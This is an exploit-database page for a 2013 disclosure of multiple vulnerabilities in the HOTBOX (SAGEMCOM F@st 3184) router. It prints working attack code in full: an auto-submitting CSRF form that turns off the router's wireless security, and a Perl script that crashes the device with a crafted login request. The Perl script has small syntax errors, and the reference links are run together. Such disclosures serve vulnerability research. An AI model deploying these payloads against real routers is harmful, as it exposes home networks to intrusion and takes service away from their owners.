header-logo
Suggest Exploit
vendor:
HOTBOX Router/Modem
by:
Oz Elisyan
N/A
CVSS
HIGH
Multiple
264, 287, 200, 22, 79
CWE
Product Name: HOTBOX Router/Modem
Affected Version From: 2.1.11
Affected Version To: Possibly earlier versions
Patch Exists: NO
Related CWE: CVE-2013-5037, CVE-2013-5038, CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, CVE-2013-5039
CPE: h:sagemcom:fast_3184
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-5194/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-7692/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-5219/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-7691/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-7692/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-7701/https://www.rapid7.com/db/vulnerabilities/suse-cve-2015-7852/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-5195/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7852/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-5194/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-7691/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-7701/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-7691/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-7701/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-7702/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-7703/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2015-7852/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2015-7702/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7692/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2015-7701/https://www.rapid7.com/db/?q=CVE-2013-5219&type=&page=2https://www.rapid7.com/db/?q=CVE-2013-5219&type=&page=2
Other Scripts: https://www.infosecmatter.com/metasploit-auxiliary-modules-detailed-spreadsheet/https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/synology_dsm_sliceupload_exec_noauthhttps://www.infosecmatter.com/list-of-metasploit-linux-exploits-detailed-spreadsheet/https://www.infosecmatter.com/metasploit-module-library/https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/http/tplink_traversal_noauthhttps://www.infosecmatter.com/nessus-plugin-library/?id=102322https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/browser/firefox_svg_pluginhttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/browser/java_storeimagearrayhttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/multi/http/jboss_seam_upload_exechttps://www.infosecmatter.com/nessus-plugin-library/?id=66697https://www.infosecmatter.com/nessus-plugin-library/?id=67708https://www.infosecmatter.com/nessus-plugin-library/?id=71433https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/misc/sercomm_exechttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/scada/codesys_gateway_server_traversal
Platforms Tested:
2013

HOTBOX Multiple Vulnerabilities

The HOTBOX router/modem appliance manufactured by SAGEMCOM and carries the model name F@st 3184 is vulnerable to multiple vulnerabilities. These vulnerabilities include default WPS Pin, authentication based on IP Address, DoS via crafted POST, Path/Directory Traversal, Script injection via DHCP request, and no CSRF Token. These vulnerabilities can be exploited to perform various attacks such as denial of service, unauthorized access, and injection of malicious scripts.

Mitigation:

It is recommended to update the firmware of the HOTBOX router/modem to the latest version to patch these vulnerabilities. Additionally, users should change the default WPS Pin and ensure that strong authentication mechanisms are in place.
Source

Exploit-DB raw data:

+------------------------------------------------------------------------------+
| HOTBOX is the leading router/modem appliance of      |
|  HOT Cable communication company in israel.           |
| The Appliance is manufactured by SAGEMCOM         |
| and carries the model name F@st 3184.                     |
+------------------------------------------------------------------------------+
| Title: HOTBOX Multiple Vulnerabilities                         |
+--------------------+---------------------------------------------------------+
| Release Date       | 2013/09/09                                    |
| Researcher         | Oz Elisyan                                     |
+--------------------+---------------------------------------------------------+
| System Affected    | HOTBOX Router/Modem               |
| Versions Affected  | 2.1.11 , possibly earlier                 |
| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|
| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218,       |
| CVE-2013-5039                                                         |
| Vendor Patched | N/A                                                 |
| Classification     | 0-day                                              |
| Exploits | http://elisyan.com/hotboxDoS.pl,                  |
| http://elisyan.com/hotboxCSRF.html                           |
+--------------------+---------------------------------------------------------+

Vulnerabilities List -
# Default WPS Pin
# Authentication based on IP Address
# DoS via crafted POST
# Path/Directory Traversal
# Script injection via DHCP request
# No CSRF Token

Demo -
http://www.youtube.com/watch?v=CPlT09ZIj48



CSRF EXPLOIT: 


<html>
    <form action='http://192.168.1.1/goform/wlanBasicSecurity' method='POST' id=1>
        <input type=hidden name="WirelessMacAddr" value="C0%3AAC%3A54%3AF8%3A67%3A58" id="WirelessMacAddr">
        <input type=hidden name="WirelessEnable1" value="1" id="WirelessEnable1">
    <input type=hidden name="ServiceSetIdentifier1" value="Elisyan" id="ServiceSetIdentifier1">
    <input type=hidden name="WirelessVendorMode" value="3" id="WirelessVendorMode">
    <input type=hidden name="ChannelNumber1" value="0" id="ChannelNumber1">
    <input type=hidden name="NBandwidth1" value="20" id="NBandwidth1">
    <input type=hidden name="ClosedNetwork1" value="0" id="ClosedNetwork1">
    <input type=hidden name="WifiSecurity" value="0" id="WifiSecurity">
    <input type=hidden name="commitwlanBasicSecurity" value="1" id="commitwlanBasicSecurity">
    <input type=hidden name="restoreWirelessDefaults1" value="0" id="restoreWirelessDefaults1">
    <input type=hidden name="scanActions1" value="0" id="scanActions1">
    <input type=hidden name="AutoSecurity1" value="1" id="AutoSecurity1">
    <input type=hidden name="wpsActions1" value="0" id="wpsActions1">
    

    </form>
</html>
<script>document.getElementById(1).submit();</script>



DENIAL OF SERVICE EXPLOIT:

use warnings;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;


# Author: Oz Elisyan
# Date: 3 September 2013
# Affected Version: <= 2.1.11

print "# HOTBOX DoS PoC #\n\n"

unless ($ARGV[0]){
  print "Please Enter Valid Host Name.\n";
  exit();
}

print "Sending Evil POST request...\n";

my $HOST = $ARGV[0];
my $URL = "http://$HOST/goform/login";
my $PostData = "loginUsername=aaaloginPassword=aaa"
my $browser = LWP::UserAgent->new();
my $req = HTTP::Request->new(POST => $URL);
$req->content_type("application/x-www-form-urlencoded");
$req->content($PostData);
my $resp = $browser->request($req);

print "Done.";

Navigation

Suggest Exploit

Services By CQR